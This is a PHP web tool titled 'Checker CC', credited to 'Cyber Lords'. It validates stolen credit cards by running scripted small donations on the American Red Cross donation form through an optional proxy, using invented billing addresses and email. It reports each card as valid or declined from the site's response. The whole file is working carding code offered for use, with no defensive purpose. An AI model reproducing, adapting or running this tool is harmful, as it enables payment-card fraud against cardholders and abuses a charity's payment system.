<?php
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Checker CC v. 1.0.3
* -------------------
* copyright : (c) Cyber Lords, 2002-2007
*
* http://www.cyberlords.net
*
* Coded by VeX [614883]
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
set_time_limit(0);
ignore_user_abort(true);
#error_reporting(!E_NOTICE);
if($_POST['x-billfname'] && $_POST['x-billlname'] &&
$_POST['x-acc1'] && $_POST['x-acc2'] && $_POST['x-sec1'])
{
if ( !CheckPHP () ) { echo "Script don't working on this server"; exit(1); }
$first = trim( $_POST['x-billfname'] );
$last = trim( $_POST['x-billlname'] );
$cc = trim( $_POST['x-acc1'] );
$exp = trim( $_POST['x-acc2'] );
$cvv = trim( $_POST['x-sec1'] );
if($_POST['proxy']) $proxy = trim( $_POST['proxy'] );
$tmp = explode("~", parse($exp));
$month = $tmp[0]; $year = $tmp[1];
#echo "<br>First Name: $first<br>Last Name: $last<br>Street: $street<br>City: $city<br>State/Province: $state<br>ZIP/Postal Code: $zip<br>Country: $country<br>Credit Card Number: $cc<br>CVV Number: $cvv<br>Expiration Date: $month $year<br><br>";
// Checking info
$host = "https://american.redcross.org/site/Donation2?idb=660832234&df_id=1113&1113.donation=form1";
$timeout = 120;
$email = "$last@yahoo.com";
$country = "United States";
$streets[] = "Sotheby Ct.";
$streets[] = "BENNER STREET";
$streets[] = "Ambergate Lane";
$streets[] = "Purple Sage";
$streets[] = "debhill terrace";
#$street = "8713 Sotheby Ct.";
$street = rand(100, 9980)." ".$streets[rand(0, count($streets))];
$city = "New York";
$state = "NY";
$zip = rand(10000, 10280);
$gift = rand(5,8);
if(ereg("^4", $cc)){ $type = 1000; }
else if(ereg("^5", $cc)){ $type = 1002; }
else if(ereg("^6", $cc)){ $type = 1006; }
else if(ereg("^3", $cc)){ $type = 1004; }
// Visa 1000
// MC 1002
// American Express 1004
// Discover 1006
$ch = curl_init();
// [1] //
if ($proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy); }
curl_setopt ($ch, CURLOPT_URL, $host);
curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))");
curl_setopt ($ch, CURLOPT_REFERER, "http://mail.yahoo.com/");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec ($ch);
// <input type="hidden" name="idb" id="idb" value="1709845530" />
if (preg_match('<input type="hidden" name="idb" id="idb" value="([^\"]*)" />', $result, $arr1)) $idb = $arr1[1];
else { echo "[1] error"; exit(1); }
// <form name="process" id="ProcessForm" action="https://american.redcross.org/site/Donation2?JServSessionIdr001=6pjj43mre1.app196a" method="post"
if (preg_match('/action="([^\"]*)" method="post"/', $result, $arr)) $action = $arr[1];
else { echo "[1] error"; exit(1); }
echo "[1] idb: $idb<br>[1] action: $action<br><br>";
$fp = fopen("content1.html", "w"); fwrite($fp, $result); fclose($fp);
// [2] //
$data = "level_standardsubmit=true&level_standardname=$gift&level_standardsubmit=true&billing_title=&billing_titlesubmit=true&billing_first_namename=$first&billing_first_namesubmit=true&billing_middle_namename=&billing_middle_namesubmit=true&billing_last_namename=$last&billing_last_namesubmit=true&billing_suffix=&billing_suffixsubmit=true&donor_email_addressname=$email&donor_email_addresssubmit=true&donor_email_opt_insubmit=true&billing_addr_street1name=$street&billing_addr_street1submit=true&billing_addr_street2name=&billing_addr_street2submit=true&billing_addr_cityname=$city&billing_addr_citysubmit=true&billing_addr_state=$state&billing_addr_statesubmit=true&billing_addr_zipname=$zip&billing_addr_zipsubmit=true&billing_addr_country=$country&billing_addr_countrysubmit=true&custom_business_name_input=&custom_business_namesubmit=true&tribute_show_honor_fieldssubmit=true&tribute_type=&tribute_typesubmit_skip=true&honoree_title=&honoree_titlesubmit_skip=true&tribute_notify_recip_title=&tribute_notify_recip_titlesubmit_skip=true&custom_tribute_first_name_input=$first&custom_tribute_first_namesubmit=true&tribute_notify_recip_namename=&tribute_notify_recip_namesubmit_skip=true&tribute_notify_recip_street1name=$street&tribute_notify_recip_street1submit_skip=true&tribute_notify_recip_street2name=&tribute_notify_recip_street2submit_skip=true&tribute_notify_recip_cityname=$city&tribute_notify_recip_citysubmit_skip=true&tribute_notify_recip_state=$state&tribute_notify_recip_statesubmit_skip=true&tribute_notify_recip_zipname=$zip&tribute_notify_recip_zipsubmit_skip=true&tribute_notify_recip_country=$country&tribute_notify_recip_countrysubmit_skip=true&tribute_message_bodyname=&tribute_message_bodysubmit_skip=true&tribute_message_closingname=&tribute_message_closingsubmit_skip=true&tribute_message_closingname=&tribute_message_closingsubmit_skip=true&tribute_signaturename=tribute_signaturesubmit_skip=true&payment_typecc_type=$type&payment_typecc_typesubmit=true&payment_typecc_numbername=$cc&payment_typecc_numbersubmit=true&payment_typecc_cvvname=$cvv&payment_typecc_cvvsubmit=true&payment_type_MONTH=$month&payment_type_YEAR=$year&payment_type_DAY=1&payment_typecc_exp_datesubmit=true&payment_typesubmit=true&pstep_next=Next&idb=$idb&df_id=1113&1113.donation=form1";
if ($proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy); }
curl_setopt ($ch, CURLOPT_URL, $action);
curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))");
curl_setopt ($ch, CURLOPT_REFERER, $host);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_POST,1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec ($ch);
if (preg_match('/action="([^\"]*)" method="post"/', $result, $arr)) $action2 = $arr[1];
else { echo "[1] error"; exit(1); }
echo "[2] action: $action2<br><br>";
$fp = fopen("content2.html", "w"); fwrite($fp, $result); fclose($fp);
// [3] //
$data = "idb=".$idb."&df_id=1113&pstep_finish=Process&1113.donation=form2";
if ($proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy); }
curl_setopt ($ch, CURLOPT_URL, $action2);
curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.1; U; en; (R1 1.5))");
curl_setopt ($ch, CURLOPT_REFERER, $action);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_POST,1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec ($ch);
$fp = fopen("content3.html", "w"); fwrite($fp, $result); fclose($fp);
curl_close ($ch);
if(preg_match("/The credit card was declined. Please check the information that you entered./i", $result)) echo "[-] The credit card was declined";
else if(preg_match("/Thank you for your generous gift/i", $result)) echo "[+] CC Valid";
else echo "[-] Check error";
echo "<br><a href=\"javascript:history.go(-1);\">Back</a>";
exit(1);
}
function parse($date)
{
$info = explode("/", $date);
if($info[0]<10){ $month = str_replace("0", "", $info[0]); }
else { $month = $info[0]; }
$year = "20".$info[1];
return $month."~".$year;
}
function CheckPHP()
{
$n = 1;
$functions[] = "curl_setopt";
$functions[] = "curl_exec";
$functions[] = "preg_match";
$functions[] = "curl_init";
$functions[] = "readdir";
echo "<table>";
foreach ( $functions as $function )
{
if ( function_exists ( $function ) )
{
//echo "<tr><td><font color=green><b>$function</font></td><td><font color=green>OK</b></font></td></tr>";
}
else
{
echo "<tr><td><font color=red><b>$function</font></td><td><font color=red>ERROR</b></font></td></tr>";
$n = 0;
}
}
echo "</table><br>";
return $n;
}
?>
<html xmlns="http://www.w3.org/1999/xhtml"><head id="Head1">
<title>Checker CC by VeX</title><center><b><h2>Checker CC v. 1.0.3</center></b></h2><br>
<meta name="Author" content="Andy Rodriguez">
<style>
body
{
background-color: #ffffff;
}
div.formQuestion
{
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
FONT-SIZE: 12px;
PADDING-BOTTOM: 2px;
PADDING-LEFT: 0px;
PADDING-RIGHT: 2px;
PADDING-TOP: 2px;
FONT-WEIGHT: bold;
TEXT-ALIGN: right;
}
div.cert
{
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
FONT-SIZE: 10px;
FONT-COLOR: BLACK;
}
div.e-ticket
{
FONT-WEIGHT: bold;
BACKGROUND-COLOR:#CCCCCC;
FONT-SIZE: 10px;
COLOR: #003366;
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
TEXT-DECORATION: none;
}
div.cross
{
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
FONT-SIZE: 12px;
COLOR: #FF0000;
FONT-WEIGHT: bold;
}
div.row0
{
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
FONT-SIZE: 9px;
FONT-COLOR: BLACK;
}
tr.row1
{
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
FONT-SIZE: 13px;
COLOR: #FFFFFF;
BORDER-STYLE: solid;
BORDER-COLOR: #FFFFFF;
BACKGROUND-COLOR: #71879A;
TEXT-ALIGN: LEFT;
}
tr.row2
{
FONT-FAMILY: tahoma, verdana, arial, helvetica, sans-serif;
FONT-SIZE: 13px;
FONT-WEIGHT: BOLD;
COLOR: #003366;
BORDER-STYLE: solid;
BORDER-COLOR: #FFFFFF;
BACKGROUND-COLOR: #CCCCCC;
}
</style>
<style media="Print" type="text/css">
body {display:none}
</style></head><body bgcolor="#ffffff">
<form enctype='multipart/form-data'
action='<?php echo $_SERVER["SCRIPT_NAME"]; ?>' method='POST'>
<div>
<table align="center" border="0">
<tbody><tr>
<td>
<hook>
</hook><table align="center" border="0" width="800"></table>
<table align="center" border="0" bordercolor="#ffffff" cellpadding="0" cellspacing="0" width="800">
<tbody><tr>
<td colspan="3">
<div class="e-ticket"><hook name="etickets">
</hook></div><table width="100%">
</tbody></table>
</td>
</tr>
<tr>
<td colspan="2"> <img ilo-full-src="https://secure2.segpay.com/static/blank.gif" src="poset.cgi_files/blank.htm" border="0" height="1" vspace="0" width="560"><br> </td>
<td rowspan="11" valign="top">
</td>
</tr>
<tr>
<td><div class="formQuestion">* First Name </div></td>
<td><div class="formContent"><input name="x-billfname" size="40" maxlength="50" value="" type="text"></div></td>
<td> </td>
</tr>
<tr>
<td><div class="formQuestion">* Last Name </div></td>
<td><div class="formContent"><input name="x-billlname" size="40" maxlength="50" value="" type="text"></div></td>
<td> </td>
</tr>
<tr>
<td align="right"><div class="formQuestion">* Credit Card Number </div></td>
<td><div class="formContent"><input name="x-acc1" size="30" maxlength="20" value="" type="text"></div></td>
</tr>
<tr>
<td align="right"><div class="formQuestion">* Credit Card Expiry (mm/yy) </div></td>
<td><div class="formContent"><input name="x-acc2" size="6" maxlength="5" value="" type="text"></div></td>
</tr>
<tr>
<td align="right"><div class="formQuestion">* Credit Card CVV Number </div></td>
<td><div class="formContent"><input name="x-sec1" size="6" maxlength="4" value="" type="text"></div></td>
</tr>
<tr>
<td align="right"><div class="formQuestion">Proxy </div></td>
<td><div class="formContent"><input name="proxy" size="15" maxlength="25" value="" type="text"></div></td>
</tr>
<tr>
<td colspan="3" align="center"><div class="formContent">
<br><br>
<input value="Check CC" type="submit">
<input name="reset" type="reset" value="Reset"><br>
<label id="mcxtra" name="mcxtra"></label>
</font></div></div></div></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form><br><br><center><b>~~~~~~~~~~~~~~~~~~~~~~<br><br>~~~~~~~~~~~~~~~~~~~~~~</center></b>
</body></html>
